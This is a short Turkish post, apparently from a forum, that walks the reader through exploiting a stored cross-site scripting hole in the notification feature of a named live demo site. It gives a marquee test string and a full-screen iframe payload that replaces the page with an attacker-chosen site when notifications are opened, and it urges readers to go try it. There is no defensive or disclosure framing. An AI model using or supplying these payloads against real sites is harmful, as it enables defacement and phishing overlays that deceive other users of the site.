Merhaba Xss Açıklığı Kulanmasını Bilene Çok Önemli Bir Açıklık Olup Bilmeyene Oyuncak Olur :)
öncelikle

http://demo.webslesson.info/

sitenin amacı : bildirim.php test etmek yani facebook tarzı bildirim göndermek
,,
sitesine gidip
enter subject diyen yere

"><marquee>MERHABAAA

yazın mesaja da xxxxxx yazın ve bildirimlere tıklayınca herşey kayıyor .
bunun yerine

"><iframe src= "burayaURL.com" style=position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;> </iframe>

Koyunca Bildirimlere Basar Basmaz Tüm Ekran Sizin Verdiğiniz Site Olarak Gözükür.
Gidip Bakın :)